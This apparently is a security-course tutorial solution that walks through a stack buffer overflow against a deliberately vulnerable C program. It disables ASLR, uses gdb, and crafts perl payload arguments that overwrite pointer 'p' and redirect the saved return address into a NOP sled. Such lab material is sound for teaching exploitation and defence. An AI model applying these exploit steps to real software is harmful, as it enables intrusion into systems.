Tutorial 06 Solutions

Let's do the environment configuration

admin@kali:~/SecurityClass/Tutorial-06$ sudo cat /proc/sys/kernel/randomize_va_space
2
admin@kali:~/SecurityClass/Tutorial-06$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0
admin@kali:~/SecurityClass/Tutorial-06$ sudo cat /proc/sys/kernel/randomize_va_space
0
admin@kali:~/SecurityClass/Tutorial-06$


Notes for 6.2

Ok, now we can compile our program and run it.

admin@kali:~/SecurityClass/Tutorial-06/6.2$ gcc -g -z execstack -o vuln vuln.c
admin@kali:~/SecurityClass/Tutorial-06/6.2$ ./vuln AAAA BBBB
p=bffff2ce       -- before 1st strcpy
p=bffff2ce       -- after 1st  strcpy
After second strcpy ;)
End of program
admin@kali:~/SecurityClass/Tutorial-06/6.2$ 

And let's show the source code so we can understand what we're doing later.

admin@kali:~/SecurityClass/Tutorial-06/6.2$ cat vuln.c 
#include "string.h"
#include "stdio.h"
#include "unistd.h"

// Example vulnerable program.
int f (char ** argv)
{
        int pipa; //unused
        char *p;
        char a[30];

        p=a;

        printf ("p=%x\t -- before 1st strcpy\n",p);
        strcpy(p,argv[1]);        // <== vulnerable strcpy()
        printf ("p=%x\t -- after 1st  strcpy\n",p);
        strncpy(p,argv[2],16);
        printf("After second strcpy ;)\n");
}

int main (int argc, char ** argv) {
        f(argv);
        execl("back_to_vul","",0);  //<-- The exec that fails
        printf("End of program\n");
        return 0;
}
admin@kali:~/SecurityClass/Tutorial-06/6.2$ 


So the goal is to evade stack protections and to do this we plan to over-write the pointer "p" with a strcpy overflow from the "vulnerable strcpy", and then we have another strcpy. Let's go into gdb and see what we can see.

admin@kali:~/SecurityClass/Tutorial-06/6.2$ gdb -q vuln                                          
Reading symbols from vuln...                                                                     
(No debugging symbols found in vuln)                                                             
(gdb) r AAAA BBBB                                                                                
Starting program: /home/admin/SecurityClass/Tutorial-06/6.2/vuln AAAA BBBB                       
p=bffff25e       -- before 1st strcpy                                                            
p=bffff25e       -- after 1st  strcpy                                                            
After second strcpy ;)                                                                           
End of program                                                                                   
[Inferior 1 (process 1128) exited normally]                                                      
(gdb) 


So we know we want to look inside the function "f" and examine the strcpy points. So let's keep some information we may want or need.

(gdb) disass main                                                                                
Dump of assembler code for function main:                                                        
   0x00401263 <+0>:     lea    0x4(%esp),%ecx
   0x00401267 <+4>:     and    $0xfffffff0,%esp
   0x0040126a <+7>:     pushl  -0x4(%ecx)
   0x0040126d <+10>:    push   %ebp
   0x0040126e <+11>:    mov    %esp,%ebp
   0x00401270 <+13>:    push   %ebx
   0x00401271 <+14>:    push   %ecx
   0x00401272 <+15>:    call   0x4010e0 <__x86.get_pc_thunk.bx>
   0x00401277 <+20>:    add    $0x2d89,%ebx
   0x0040127d <+26>:    mov    %ecx,%eax
   0x0040127f <+28>:    sub    $0xc,%esp
   0x00401282 <+31>:    pushl  0x4(%eax)
   0x00401285 <+34>:    call   0x4011d9 <f>
   0x0040128a <+39>:    add    $0x10,%esp
   0x0040128d <+42>:    sub    $0x4,%esp
   0x00401290 <+45>:    push   $0x0
   0x00401292 <+47>:    lea    -0x1fa9(%ebx),%eax
   0x00401298 <+53>:    push   %eax
   0x00401299 <+54>:    lea    -0x1fa8(%ebx),%eax
   0x0040129f <+60>:    push   %eax
   0x004012a0 <+61>:    call   0x401080 <execl@plt>
   0x004012a5 <+66>:    add    $0x10,%esp
   0x004012a8 <+69>:    sub    $0xc,%esp
   0x004012ab <+72>:    lea    -0x1f9c(%ebx),%eax
   0x004012b1 <+78>:    push   %eax
   0x004012b2 <+79>:    call   0x401050 <puts@plt>
   0x004012b7 <+84>:    add    $0x10,%esp
   0x004012ba <+87>:    mov    $0x0,%eax
   0x004012bf <+92>:    lea    -0x8(%ebp),%esp
   0x004012c2 <+95>:    pop    %ecx
   0x004012c3 <+96>:    pop    %ebx
   0x004012c4 <+97>:    pop    %ebp
   0x004012c5 <+98>:    lea    -0x4(%ecx),%esp
   0x004012c8 <+101>:   ret    
End of assembler dump.
(gdb) 

In gdb address of next instruction after "f": 0x0040128a, this is useful to know when we're looking for stored values on the stack later.


Let's break on "f" and run the code and see what it looks like.'Here I know that the buffer size (from the source code) is 30 bytes, so I'll send a 30 byte string as the first argument.

(gdb) b f 
Breakpoint 1 at 0x4011dd
(gdb) r `perl -e 'print "A"x30'` BBBB
Starting program: /home/admin/SecurityClass/Tutorial-06/6.2/vuln AAAA BBBB

Breakpoint 1, 0x004011dd in f ()
(gdb) 


Now I'm going to put break points after each of the strcpy calls in the "f" function.


(gdb) disass f
Dump of assembler code for function f:
   0x004011d9 <+0>:     push   %ebp
   0x004011da <+1>:     mov    %esp,%ebp
   0x004011dc <+3>:     push   %ebx
=> 0x004011dd <+4>:     sub    $0x34,%esp
   0x004011e0 <+7>:     call   0x4010e0 <__x86.get_pc_thunk.bx>
   0x004011e5 <+12>:    add    $0x2e1b,%ebx
   0x004011eb <+18>:    lea    -0x2a(%ebp),%eax
   0x004011ee <+21>:    mov    %eax,-0xc(%ebp)
   0x004011f1 <+24>:    sub    $0x8,%esp
   0x004011f4 <+27>:    pushl  -0xc(%ebp)
   0x004011f7 <+30>:    lea    -0x1ff8(%ebx),%eax
   0x004011fd <+36>:    push   %eax
   0x004011fe <+37>:    call   0x401030 <printf@plt>
   0x00401203 <+42>:    add    $0x10,%esp
   0x00401206 <+45>:    mov    0x8(%ebp),%eax
   0x00401209 <+48>:    add    $0x4,%eax
   0x0040120c <+51>:    mov    (%eax),%eax
   0x0040120e <+53>:    sub    $0x8,%esp
   0x00401211 <+56>:    push   %eax
   0x00401212 <+57>:    pushl  -0xc(%ebp)
   0x00401215 <+60>:    call   0x401040 <strcpy@plt>
   0x0040121a <+65>:    add    $0x10,%esp
   0x0040121d <+68>:    sub    $0x8,%esp
   0x00401220 <+71>:    pushl  -0xc(%ebp)
   0x00401223 <+74>:    lea    -0x1fdc(%ebx),%eax
   0x00401229 <+80>:    push   %eax
   0x0040122a <+81>:    call   0x401030 <printf@plt>
   0x0040122f <+86>:    add    $0x10,%esp
   0x00401232 <+89>:    mov    0x8(%ebp),%eax
   0x00401235 <+92>:    add    $0x8,%eax
   0x00401238 <+95>:    mov    (%eax),%eax
   0x0040123a <+97>:    sub    $0x4,%esp
   0x0040123d <+100>:   push   $0x10
   0x0040123f <+102>:   push   %eax
   0x00401240 <+103>:   pushl  -0xc(%ebp)
   0x00401243 <+106>:   call   0x401070 <strncpy@plt>
   0x00401248 <+111>:   add    $0x10,%esp
   0x0040124b <+114>:   sub    $0xc,%esp
   0x0040124e <+117>:   lea    -0x1fc0(%ebx),%eax
   0x00401254 <+123>:   push   %eax
   0x00401255 <+124>:   call   0x401050 <puts@plt>
   0x0040125a <+129>:   add    $0x10,%esp
   0x0040125d <+132>:   nop
   0x0040125e <+133>:   mov    -0x4(%ebp),%ebx
   0x00401261 <+136>:   leave  
   0x00401262 <+137>:   ret    
End of assembler dump.
(gdb) b *0x0040121a
Breakpoint 2 at 0x40121a
(gdb) b *0x00401248
Breakpoint 3 at 0x401248
(gdb) 


Now I'm ready to start looking around. Before the first strcpy I don't expect to find much of interest on the stack, but let's look anyway.


(gdb) x/80xw $esp
0xbffff294:     0x00404000      0xbffff2b8      0x0040128a      0xbffff364
0xbffff2a4:     0xbffff364      0xbffff374      0x00401277      0xbffff2d0
0xbffff2b4:     0x00000000      0x00000000      0xb7dff7e1      0xb7fb8000
0xbffff2c4:     0xb7fb8000      0x00000000      0xb7dff7e1      0x00000003
0xbffff2d4:     0xbffff364      0xbffff374      0xbffff2f4      0x00000001
0xbffff2e4:     0x00000000      0xb7fb8000      0x00000000      0xb7fff000
0xbffff2f4:     0x00000000      0xb7fb8000      0xb7fb8000      0x00000000
0xbffff304:     0x6e030c86      0x2e09ea96      0x00000000      0x00000000
0xbffff314:     0x00000000      0x00000003      0x004010a0      0x00000000
0xbffff324:     0xb7feb450      0xb7fe62d0      0x00404000      0x00000003
0xbffff334:     0x004010a0      0x00000000      0x004010d1      0x00401263
0xbffff344:     0x00000003      0xbffff364      0x004012d0      0x00401330
0xbffff354:     0xb7fe62d0      0xbffff35c      0x0000001c      0x00000003
0xbffff364:     0xbffff4eb      0xbffff51a      0xbffff539      0x00000000
0xbffff374:     0xbffff53e      0xbffff54e      0xbffff59a      0xbffff5a5
0xbffff384:     0xbffff5b8      0xbffff5d1      0xbffff60b      0xbffff621
0xbffff394:     0xbffff62b      0xbffff659      0xbffff67a      0xbffff68c
0xbffff3a4:     0xbffff69b      0xbffff6c9      0xbffff6d7      0xbffff6fc
0xbffff3b4:     0xbffff716      0xbffff72b      0xbffff73a      0xbffff75d
0xbffff3c4:     0xbffff78e      0xbffff797      0xbffff7a8      0xbffff7b8
(gdb) c
Continuing.
p=bffff26e       -- before 1st strcpy

Breakpoint 2, 0x0040121a in f ()
(gdb) x/80xw $esp
0xbffff250:     0xbffff26e      0xbffff51a      0xb7fff000      0x004011e5
0xbffff260:     0x00000000      0xbffff364      0xb7fb8000      0x414169e0
0xbffff270:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff280:     0x41414141      0x41414141      0x41414141      0xbffff200
0xbffff290:     0xb7fb83fc      0x00404000      0xbffff2b8      0x0040128a
0xbffff2a0:     0xbffff364      0xbffff364      0xbffff374      0x00401277
0xbffff2b0:     0xbffff2d0      0x00000000      0x00000000      0xb7dff7e1
0xbffff2c0:     0xb7fb8000      0xb7fb8000      0x00000000      0xb7dff7e1
0xbffff2d0:     0x00000003      0xbffff364      0xbffff374      0xbffff2f4
0xbffff2e0:     0x00000001      0x00000000      0xb7fb8000      0x00000000
0xbffff2f0:     0xb7fff000      0x00000000      0xb7fb8000      0xb7fb8000
0xbffff300:     0x00000000      0x6e030c86      0x2e09ea96      0x00000000
0xbffff310:     0x00000000      0x00000000      0x00000003      0x004010a0
0xbffff320:     0x00000000      0xb7feb450      0xb7fe62d0      0x00404000
0xbffff330:     0x00000003      0x004010a0      0x00000000      0x004010d1
0xbffff340:     0x00401263      0x00000003      0xbffff364      0x004012d0
0xbffff350:     0x00401330      0xb7fe62d0      0xbffff35c      0x0000001c
0xbffff360:     0x00000003      0xbffff4eb      0xbffff51a      0xbffff539
0xbffff370:     0x00000000      0xbffff53e      0xbffff54e      0xbffff59a
0xbffff380:     0xbffff5a5      0xbffff5b8      0xbffff5d1      0xbffff60b
(gdb)


We can see that our string has been copied somewhere onto the stack (starting at address 0xbffff26e

(gdb) x/8xw 0xbffff26e
0xbffff26e:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff27e:     0x41414141      0x41414141      0x41414141      0xf2004141
(gdb) 


Let's continue and see what we see.


(gdb) c
Continuing.
p=bffff200       -- after 1st  strcpy

Breakpoint 3, 0x00401248 in f ()
(gdb) 


If we compare to when the program before the strcpy above before we can see that we have overflowed and written to the last byte of this address. According to the source code this is the address of the "p" variable.


So now we could probably change the value of the "p" address by adding four bytes to our buffer, let's see what happens.


(gdb) r `perl -e 'print "A"x30 . "QQQQ"'` BBBB
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/admin/SecurityClass/Tutorial-06/6.2/vuln `perl -e 'print "A"x30 . "QQQQ"'` BBBB

Breakpoint 1, 0x004011dd in f ()
(gdb) x/80xw $esp
0xbffff294:     0x00404000      0xbffff2b8      0x0040128a      0xbffff364
0xbffff2a4:     0xbffff364      0xbffff374      0x00401277      0xbffff2d0
0xbffff2b4:     0x00000000      0x00000000      0xb7dff7e1      0xb7fb8000
0xbffff2c4:     0xb7fb8000      0x00000000      0xb7dff7e1      0x00000003
0xbffff2d4:     0xbffff364      0xbffff374      0xbffff2f4      0x00000001
0xbffff2e4:     0x00000000      0xb7fb8000      0x00000000      0xb7fff000
0xbffff2f4:     0x00000000      0xb7fb8000      0xb7fb8000      0x00000000
0xbffff304:     0xdc5fb1ac      0x9c5557bc      0x00000000      0x00000000
0xbffff314:     0x00000000      0x00000003      0x004010a0      0x00000000
0xbffff324:     0xb7feb450      0xb7fe62d0      0x00404000      0x00000003
0xbffff334:     0x004010a0      0x00000000      0x004010d1      0x00401263
0xbffff344:     0x00000003      0xbffff364      0x004012d0      0x00401330
0xbffff354:     0xb7fe62d0      0xbffff35c      0x0000001c      0x00000003
0xbffff364:     0xbffff4e7      0xbffff516      0xbffff539      0x00000000
0xbffff374:     0xbffff53e      0xbffff54e      0xbffff59a      0xbffff5a5
0xbffff384:     0xbffff5b8      0xbffff5d1      0xbffff60b      0xbffff621
0xbffff394:     0xbffff62b      0xbffff659      0xbffff67a      0xbffff68c
0xbffff3a4:     0xbffff69b      0xbffff6c9      0xbffff6d7      0xbffff6fc
0xbffff3b4:     0xbffff716      0xbffff72b      0xbffff73a      0xbffff75d
0xbffff3c4:     0xbffff78e      0xbffff797      0xbffff7a8      0xbffff7b8
(gdb) c
Continuing.
p=bffff26e       -- before 1st strcpy

Breakpoint 2, 0x0040121a in f ()
(gdb) x/80xw $esp
0xbffff250:     0xbffff26e      0xbffff516      0xb7fff000      0x004011e5
0xbffff260:     0x00000000      0xbffff364      0xb7fb8000      0x414169e0
0xbffff270:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff280:     0x41414141      0x41414141      0x41414141      0x51515151
0xbffff290:     0xb7fb8300      0x00404000      0xbffff2b8      0x0040128a
0xbffff2a0:     0xbffff364      0xbffff364      0xbffff374      0x00401277
0xbffff2b0:     0xbffff2d0      0x00000000      0x00000000      0xb7dff7e1
0xbffff2c0:     0xb7fb8000      0xb7fb8000      0x00000000      0xb7dff7e1
0xbffff2d0:     0x00000003      0xbffff364      0xbffff374      0xbffff2f4
0xbffff2e0:     0x00000001      0x00000000      0xb7fb8000      0x00000000
0xbffff2f0:     0xb7fff000      0x00000000      0xb7fb8000      0xb7fb8000
0xbffff300:     0x00000000      0xdc5fb1ac      0x9c5557bc      0x00000000
0xbffff310:     0x00000000      0x00000000      0x00000003      0x004010a0
0xbffff320:     0x00000000      0xb7feb450      0xb7fe62d0      0x00404000
0xbffff330:     0x00000003      0x004010a0      0x00000000      0x004010d1
0xbffff340:     0x00401263      0x00000003      0xbffff364      0x004012d0
0xbffff350:     0x00401330      0xb7fe62d0      0xbffff35c      0x0000001c
0xbffff360:     0x00000003      0xbffff4e7      0xbffff516      0xbffff539
0xbffff370:     0x00000000      0xbffff53e      0xbffff54e      0xbffff59a
0xbffff380:     0xbffff5a5      0xbffff5b8      0xbffff5d1      0xbffff60b
(gdb) c
Continuing.
p=51515151       -- after 1st  strcpy

Program received signal SIGSEGV, Segmentation fault.
__strncpy_sse2 () at ../sysdeps/i386/i686/multiarch/strcpy-sse2.S:535
535     ../sysdeps/i386/i686/multiarch/strcpy-sse2.S: No such file or directory.
(gdb) 



This looks "good", we've over written the address used by "p" (and so caused a segmentation fault). Now we just need to target a value we care about, for example the stored EIP. Let's recall that this is stored just a little further down in memory, in this case it looks like it's at 0xbffff29c.


(gdb) x/1xw 0xbffff29c
0xbffff29c:     0x0040128a
(gdb) 


So let's craft our exploit to now have this address in the last four bytes of the first string. Let's also put a break point at the end of the "f" function so we can see what the stored/next EIP is.

(gdb) r `perl -e 'print "A"x30 . "\x9c\xf2\xff\xbf"'` BBBB
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/admin/SecurityClass/Tutorial-06/6.2/vuln `perl -e 'print "A"x30 . "\x9c\xf2\xff\xbf"'` BBBB

Breakpoint 1, 0x004011dd in f ()
(gdb) x/80xw $esp
0xbffff294:     0x00404000      0xbffff2b8      0x0040128a      0xbffff364
0xbffff2a4:     0xbffff364      0xbffff374      0x00401277      0xbffff2d0
0xbffff2b4:     0x00000000      0x00000000      0xb7dff7e1      0xb7fb8000
0xbffff2c4:     0xb7fb8000      0x00000000      0xb7dff7e1      0x00000003
0xbffff2d4:     0xbffff364      0xbffff374      0xbffff2f4      0x00000001
0xbffff2e4:     0x00000000      0xb7fb8000      0x00000000      0xb7fff000
0xbffff2f4:     0x00000000      0xb7fb8000      0xb7fb8000      0x00000000
0xbffff304:     0x39dc07b9      0x79d6e1a9      0x00000000      0x00000000
0xbffff314:     0x00000000      0x00000003      0x004010a0      0x00000000
0xbffff324:     0xb7feb450      0xb7fe62d0      0x00404000      0x00000003
0xbffff334:     0x004010a0      0x00000000      0x004010d1      0x00401263
0xbffff344:     0x00000003      0xbffff364      0x004012d0      0x00401330
0xbffff354:     0xb7fe62d0      0xbffff35c      0x0000001c      0x00000003
0xbffff364:     0xbffff4e7      0xbffff516      0xbffff539      0x00000000
0xbffff374:     0xbffff53e      0xbffff54e      0xbffff59a      0xbffff5a5
0xbffff384:     0xbffff5b8      0xbffff5d1      0xbffff60b      0xbffff621
0xbffff394:     0xbffff62b      0xbffff659      0xbffff67a      0xbffff68c
0xbffff3a4:     0xbffff69b      0xbffff6c9      0xbffff6d7      0xbffff6fc
0xbffff3b4:     0xbffff716      0xbffff72b      0xbffff73a      0xbffff75d
0xbffff3c4:     0xbffff78e      0xbffff797      0xbffff7a8      0xbffff7b8
(gdb) c
Continuing.
p=bffff26e       -- before 1st strcpy

Breakpoint 2, 0x0040121a in f ()
(gdb) x/80xw $esp
0xbffff250:     0xbffff26e      0xbffff516      0xb7fff000      0x004011e5
0xbffff260:     0x00000000      0xbffff364      0xb7fb8000      0x414169e0
0xbffff270:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff280:     0x41414141      0x41414141      0x41414141      0xbffff29c
0xbffff290:     0xb7fb8300      0x00404000      0xbffff2b8      0x0040128a
0xbffff2a0:     0xbffff364      0xbffff364      0xbffff374      0x00401277
0xbffff2b0:     0xbffff2d0      0x00000000      0x00000000      0xb7dff7e1
0xbffff2c0:     0xb7fb8000      0xb7fb8000      0x00000000      0xb7dff7e1
0xbffff2d0:     0x00000003      0xbffff364      0xbffff374      0xbffff2f4
0xbffff2e0:     0x00000001      0x00000000      0xb7fb8000      0x00000000
0xbffff2f0:     0xb7fff000      0x00000000      0xb7fb8000      0xb7fb8000
0xbffff300:     0x00000000      0x39dc07b9      0x79d6e1a9      0x00000000
0xbffff310:     0x00000000      0x00000000      0x00000003      0x004010a0
0xbffff320:     0x00000000      0xb7feb450      0xb7fe62d0      0x00404000
0xbffff330:     0x00000003      0x004010a0      0x00000000      0x004010d1
0xbffff340:     0x00401263      0x00000003      0xbffff364      0x004012d0
0xbffff350:     0x00401330      0xb7fe62d0      0xbffff35c      0x0000001c
0xbffff360:     0x00000003      0xbffff4e7      0xbffff516      0xbffff539
0xbffff370:     0x00000000      0xbffff53e      0xbffff54e      0xbffff59a
0xbffff380:     0xbffff5a5      0xbffff5b8      0xbffff5d1      0xbffff60b
(gdb) c
Continuing.
p=bffff29c       -- after 1st  strcpy

Breakpoint 3, 0x00401248 in f ()
(gdb) x/80xw $esp
0xbffff250:     0xbffff29c      0xbffff539      0x00000010      0x004011e5
0xbffff260:     0x00000000      0xbffff364      0xb7fb8000      0x414169e0
0xbffff270:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff280:     0x41414141      0x41414141      0x41414141      0xbffff29c
0xbffff290:     0xb7fb8300      0x00404000      0xbffff2b8      0x42424242
0xbffff2a0:     0x00000000      0x00000000      0x00000000      0x00401277
0xbffff2b0:     0xbffff2d0      0x00000000      0x00000000      0xb7dff7e1
0xbffff2c0:     0xb7fb8000      0xb7fb8000      0x00000000      0xb7dff7e1
0xbffff2d0:     0x00000003      0xbffff364      0xbffff374      0xbffff2f4
0xbffff2e0:     0x00000001      0x00000000      0xb7fb8000      0x00000000
0xbffff2f0:     0xb7fff000      0x00000000      0xb7fb8000      0xb7fb8000
0xbffff300:     0x00000000      0x39dc07b9      0x79d6e1a9      0x00000000
0xbffff310:     0x00000000      0x00000000      0x00000003      0x004010a0
0xbffff320:     0x00000000      0xb7feb450      0xb7fe62d0      0x00404000
0xbffff330:     0x00000003      0x004010a0      0x00000000      0x004010d1
0xbffff340:     0x00401263      0x00000003      0xbffff364      0x004012d0
0xbffff350:     0x00401330      0xb7fe62d0      0xbffff35c      0x0000001c
0xbffff360:     0x00000003      0xbffff4e7      0xbffff516      0xbffff539
0xbffff370:     0x00000000      0xbffff53e      0xbffff54e      0xbffff59a
0xbffff380:     0xbffff5a5      0xbffff5b8      0xbffff5d1      0xbffff60b
(gdb) 


Here we cans ee that the stored EIP is now the value of the second string:

(gdb) x/1xw 0xbffff29c
0xbffff29c:     0x42424242
(gdb)



Now we have all the tools to craft an exploit, we need a shellcode (somewhere in memory), and we can over flow from the first strcpy to change the address of "p" and use this to write the stored EIP to the shellcode.

In past tutorials we had a shellcode, but it's too big for the buffer here. Since I'm lazy about writing a new tiny shellcode and testing it, I'm going to put my old shellcode in memory somewhere. Let's start by creating a new place for my shellcode


(gdb) r `perl -e 'print "A"x30 . "\x9c\xf2\xff\xbf"'` BBBB `perl -e 'print "\x90"x1024'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/admin/SecurityClass/Tutorial-06/6.2/vuln `perl -e 'print "A"x30 . "\x9c\xf2\xff\xbf"'` BBBB `perl -e 'print "\x90"x1024'`

Breakpoint 1, 0x004011dd in f ()
(gdb) x/80xw $esp
0xbfffee84:     0x00404000      0xbfffeea8      0x0040128a      0xbfffef54
0xbfffee94:     0xbfffef54      0xbfffef68      0x00401277      0xbfffeec0
0xbfffeea4:     0x00000000      0x00000000      0xb7dff7e1      0xb7fb8000
0xbfffeeb4:     0xb7fb8000      0x00000000      0xb7dff7e1      0x00000004
0xbfffeec4:     0xbfffef54      0xbfffef68      0xbfffeee4      0x00000001
0xbfffeed4:     0x00000000      0xb7fb8000      0x00000000      0xb7fff000
0xbfffeee4:     0x00000000      0xb7fb8000      0xb7fb8000      0x00000000
0xbfffeef4:     0xc398187e      0x83aade6e      0x00000000      0x00000000
0xbfffef04:     0x00000000      0x00000004      0x004010a0      0x00000000
0xbfffef14:     0xb7feb450      0xb7fe62d0      0x00404000      0x00000004
0xbfffef24:     0x004010a0      0x00000000      0x004010d1      0x00401263
0xbfffef34:     0x00000004      0xbfffef54      0x004012d0      0x00401330
0xbfffef44:     0xb7fe62d0      0xbfffef4c      0x0000001c      0x00000004
0xbfffef54:     0xbffff0e6      0xbffff115      0xbffff138      0xbffff13d
0xbfffef64:     0x00000000      0xbffff53e      0xbffff54e      0xbffff59a
0xbfffef74:     0xbffff5a5      0xbffff5b8      0xbffff5d1      0xbffff60b
0xbfffef84:     0xbffff621      0xbffff62b      0xbffff659      0xbffff67a
0xbfffef94:     0xbffff68c      0xbffff69b      0xbffff6c9      0xbffff6d7
0xbfffefa4:     0xbffff6fc      0xbffff716      0xbffff72b      0xbffff73a
0xbfffefb4:     0xbffff75d      0xbffff78e      0xbffff797      0xbffff7a8
(gdb) 


Here I've added a third argument with 1024 characters (at the moment a giant NOP sled). We just need to find where this is, luckily it is not too hard if we remember how arguments are passed.

Observe that the "f" function takes the arguments to the program, so in the "f" function we will have a point to an array of pointers to strings. Each of these strings is one of the command line arguments.

So examining the stored values on the stack above, we see a few that look like addresses on the stack. Let's have a quick look at some of them.


(gdb) x/8xw 0xbfffeea8
0xbfffeea8:     0x00000000      0xb7dff7e1      0xb7fb8000      0xb7fb8000
0xbfffeeb8:     0x00000000      0xb7dff7e1      0x00000004      0xbfffef54
(gdb) x/8xw 0xbfffef54
0xbfffef54:     0xbffff0e6      0xbffff115      0xbffff138      0xbffff13d
0xbfffef64:     0x00000000      0xbffff53e      0xbffff54e      0xbffff59a
(gdb)


The first one we looked at doesn't look good, the first word/value is 0 so we expect nothing here. The second one however looks very good since there are four addresses (stack addresses) then the 0 word to insidcate the end. Recall we passed three arguments in, and the 0th argument is the name of the program. So we're looking for an arracy with four stack addresses. We can confirm y looking at any of them, but let's look at the third which should be one word "BBBB".


(gdb) x/8xw 0xbffff138
0xbffff138:     0x42424242      0x90909000      0x90909090      0x90909090
0xbffff148:     0x90909090      0x90909090      0x90909090      0x90909090
(gdb) 

Looks like we found the places on the stack, and most importantly we know our NOP sled starts around 0xbffff13d

Since we also changed the length of the arguments, we have to change all our addresses on the stack, but this should be a quick fix now we know what we're doing.


(gdb) r `perl -e 'print "A"x30 . "\x8c\xee\xff\xbf"'` `perl -e 'print "\x48\xf1\xff\xbf"'` `perl -e 'print "\x90"x1024'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/admin/SecurityClass/Tutorial-06/6.2/vuln `perl -e 'print "A"x30 . "\x8c\xee\xff\xbf"'` `perl -e 'print "\x48\xf1\xff\xbf"'` `perl -e 'print "\x90"x1024'`

Breakpoint 1, 0x004011dd in f ()
(gdb) x/80xw $esp
0xbfffee84:     0x00404000      0xbfffeea8      0x0040128a      0xbfffef54
0xbfffee94:     0xbfffef54      0xbfffef68      0x00401277      0xbfffeec0
0xbfffeea4:     0x00000000      0x00000000      0xb7dff7e1      0xb7fb8000
0xbfffeeb4:     0xb7fb8000      0x00000000      0xb7dff7e1      0x00000004
0xbfffeec4:     0xbfffef54      0xbfffef68      0xbfffeee4      0x00000001
0xbfffeed4:     0x00000000      0xb7fb8000      0x00000000      0xb7fff000
0xbfffeee4:     0x00000000      0xb7fb8000      0xb7fb8000      0x00000000
0xbfffeef4:     0xbd6723ef      0xfd55e5ff      0x00000000      0x00000000
0xbfffef04:     0x00000000      0x00000004      0x004010a0      0x00000000
0xbfffef14:     0xb7feb450      0xb7fe62d0      0x00404000      0x00000004
0xbfffef24:     0x004010a0      0x00000000      0x004010d1      0x00401263
0xbfffef34:     0x00000004      0xbfffef54      0x004012d0      0x00401330
0xbfffef44:     0xb7fe62d0      0xbfffef4c      0x0000001c      0x00000004
0xbfffef54:     0xbffff0e6      0xbffff115      0xbffff138      0xbffff13d
0xbfffef64:     0x00000000      0xbffff53e      0xbffff54e      0xbffff59a
0xbfffef74:     0xbffff5a5      0xbffff5b8      0xbffff5d1      0xbffff60b
0xbfffef84:     0xbffff621      0xbffff62b      0xbffff659      0xbffff67a
0xbfffef94:     0xbffff68c      0xbffff69b      0xbffff6c9      0xbffff6d7
0xbfffefa4:     0xbffff6fc      0xbffff716      0xbffff72b      0xbffff73a
0xbfffefb4:     0xbffff75d      0xbffff78e      0xbffff797      0xbffff7a8
(gdb) c
Continuing.
p=bfffee5e       -- before 1st strcpy

Breakpoint 2, 0x0040121a in f ()
(gdb) x/80xw $esp
0xbfffee40:     0xbfffee5e      0xbffff115      0xb7fff000      0x004011e5
0xbfffee50:     0x00000000      0xbfffef54      0xb7fb8000      0x414169e0
0xbfffee60:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffee70:     0x41414141      0x41414141      0x41414141      0xbfffee8c
0xbfffee80:     0xb7fb8300      0x00404000      0xbfffeea8      0x0040128a
0xbfffee90:     0xbfffef54      0xbfffef54      0xbfffef68      0x00401277
0xbfffeea0:     0xbfffeec0      0x00000000      0x00000000      0xb7dff7e1
0xbfffeeb0:     0xb7fb8000      0xb7fb8000      0x00000000      0xb7dff7e1
0xbfffeec0:     0x00000004      0xbfffef54      0xbfffef68      0xbfffeee4
0xbfffeed0:     0x00000001      0x00000000      0xb7fb8000      0x00000000
0xbfffeee0:     0xb7fff000      0x00000000      0xb7fb8000      0xb7fb8000
0xbfffeef0:     0x00000000      0xbd6723ef      0xfd55e5ff      0x00000000
0xbfffef00:     0x00000000      0x00000000      0x00000004      0x004010a0
0xbfffef10:     0x00000000      0xb7feb450      0xb7fe62d0      0x00404000
0xbfffef20:     0x00000004      0x004010a0      0x00000000      0x004010d1
0xbfffef30:     0x00401263      0x00000004      0xbfffef54      0x004012d0
0xbfffef40:     0x00401330      0xb7fe62d0      0xbfffef4c      0x0000001c
0xbfffef50:     0x00000004      0xbffff0e6      0xbffff115      0xbffff138
0xbfffef60:     0xbffff13d      0x00000000      0xbffff53e      0xbffff54e
0xbfffef70:     0xbffff59a      0xbffff5a5      0xbffff5b8      0xbffff5d1
(gdb) c
Continuing.
p=bfffee8c       -- after 1st  strcpy

Breakpoint 3, 0x00401248 in f ()
(gdb) x/80xw $esp
0xbfffee40:     0xbfffee8c      0xbffff138      0x00000010      0x004011e5
0xbfffee50:     0x00000000      0xbfffef54      0xb7fb8000      0x414169e0
0xbfffee60:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffee70:     0x41414141      0x41414141      0x41414141      0xbfffee8c
0xbfffee80:     0xb7fb8300      0x00404000      0xbfffeea8      0xbffff148
0xbfffee90:     0x00000000      0x00000000      0x00000000      0x00401277
0xbfffeea0:     0xbfffeec0      0x00000000      0x00000000      0xb7dff7e1
0xbfffeeb0:     0xb7fb8000      0xb7fb8000      0x00000000      0xb7dff7e1
0xbfffeec0:     0x00000004      0xbfffef54      0xbfffef68      0xbfffeee4
0xbfffeed0:     0x00000001      0x00000000      0xb7fb8000      0x00000000
0xbfffeee0:     0xb7fff000      0x00000000      0xb7fb8000      0xb7fb8000
0xbfffeef0:     0x00000000      0xbd6723ef      0xfd55e5ff      0x00000000
0xbfffef00:     0x00000000      0x00000000      0x00000004      0x004010a0
0xbfffef10:     0x00000000      0xb7feb450      0xb7fe62d0      0x00404000
0xbfffef20:     0x00000004      0x004010a0      0x00000000      0x004010d1
0xbfffef30:     0x00401263      0x00000004      0xbfffef54      0x004012d0
0xbfffef40:     0x00401330      0xb7fe62d0      0xbfffef4c      0x0000001c
0xbfffef50:     0x00000004      0xbffff0e6      0xbffff115      0xbffff138
0xbfffef60:     0xbffff13d      0x00000000      0xbffff53e      0xbffff54e
0xbfffef70:     0xbffff59a      0xbffff5a5      0xbffff5b8      0xbffff5d1
(gdb) x/8xw 0xbffff148
0xbffff148:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff158:     0x90909090      0x90909090      0x90909090      0x90909090
(gdb) 


